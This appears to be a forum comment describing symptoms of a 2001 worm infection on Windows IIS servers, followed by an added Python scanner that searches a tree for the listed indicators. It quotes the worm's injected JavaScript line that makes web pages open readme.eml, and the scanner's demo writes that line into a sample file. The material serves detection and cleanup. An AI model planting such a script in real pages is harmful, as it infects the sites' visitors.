Some symptoms (Score 1)
- Windows File Protection errors:
At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:
"File replacement was attempted on the protected system file ... This file was restored to the original version to maintain system stability":
d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
d:\program files\outlook express\wabmig.exe
d:\program files\outlook express\wab.exe
d:\program files\windows nt\pinball\pinball.exe
d:\winnt\system32\mspaint.exe
d:\program files\outlook express\msimn.exe
d:\program files\internet explorer\connection wizard\isignup.exe
d:\program files\internet explorer\connection wizard\inetwiz.exe
d:\winnt\system32\inetsrv\inetmgr.exe
d:\program files\internet explorer\connection wizard\icwconn2.exe
d:\program files\internet explorer\connection wizard\icwconn1.exe
d:\program files\windows nt\dialer.exe
d:\program files\netmeeting\conf.exe
d:\winnt\system32\cmmgr32.exe
The virus exe references this registry string, so I guess it's possible this is where it's grabbing some of these paths:
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
- IE crashing on NT:
On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple of instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The .tmp files seem to contain the MIME attachment data for readme.exe:
mepDF.tmp - 78 KB
mepEO.tmp - 78 KB
mepE3.tmp - 78 KB
mep181.tmp - 78 KB
mep183.tmp - 78 KB
mepE2.tmp.exe - 56 KB
mepE4.tmp.exe - 56 KB
mepE5.tmp.exe - 56 KB
A few more similar looking files.
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of JavaScript code was appended to some of the html and asp files in my virtual IIS dirs:
<html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
- One of the virus .exe files contains the string:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
- My suggestion is to do a full search for any of these files and check them out. Note the modification dates.
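A defender-side sweep for the indicators listed in this comment (the dropped .eml/.nws names, the mep*.tmp files, and the script line appended to .html/.asp files), reporting each hit with its modification time, as an added example that is not code from the original post. It scans a constructed sample tree in a temporary directory rather than a real system; the file names and script text are the ones quoted above.

```python
import os
import re
import tempfile
from datetime import datetime, timezone
# Indicators from the comment: dropped .eml/.nws names, mep*.tmp(.exe) files, appended script.
DROPPED_NAMES = {"readme.eml", "desktop.eml", "sample.eml", "desktop.nws"}
TEMP_PATTERN = re.compile(r"^mep\w+\.tmp(\.exe)?$", re.IGNORECASE)
WEB_EXTS = {".htm", ".html", ".asp"}
INJECTED = re.compile(rb'window\.open\s*\(\s*"readme\.eml"', re.IGNORECASE)

def scan_tree(root):
    """Return sorted (kind, path, mtime_iso) tuples for files matching an indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            kind = None
            if name.lower() in DROPPED_NAMES:
                kind = "dropped-eml"
            elif TEMP_PATTERN.match(name):
                kind = "mep-temp"
            elif os.path.splitext(name.lower())[1] in WEB_EXTS:
                with open(path, "rb") as fh:  # only web files are read for the appended script
                    if INJECTED.search(fh.read()):
                        kind = "injected-script"
            if kind:  # record the modification time, as the comment suggests checking
                stamp = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                hits.append((kind, path, stamp.isoformat(timespec="seconds")))
    return sorted(hits)

def build_demo_tree(root):
    """Write a constructed sample tree (not real infected data) to exercise the scanner."""
    os.makedirs(os.path.join(root, "wwwroot", "sub"))
    samples = {
        ("wwwroot", "default.asp"): b'<%= Now() %>\n<html><script language="JavaScript">'
            b'window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>',
        ("wwwroot", "sub", "readme.eml"): b"MIME-Version: 1.0\r\n",
        ("wwwroot", "sub", "desktop.nws"): b"",
        ("mepE2.tmp.exe",): b"MZ",
        ("notes.txt",): b'window.open("readme.eml")',  # not a web file, so not flagged
    }
    for parts, data in samples.items():
        with open(os.path.join(root, *parts), "wb") as fh:
            fh.write(data)

def run_demo():
    # Build the sample tree in a temp dir and return (kind, relative path) hits.
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        return [(k, os.path.relpath(p, demo).replace(os.sep, "/")) for k, p, _ in scan_tree(demo)]
```

Point scan_tree at a copied-off web root or WINNT directory to get the full list with timestamps; anything flagged should be compared against the time the worm hit before it is deleted.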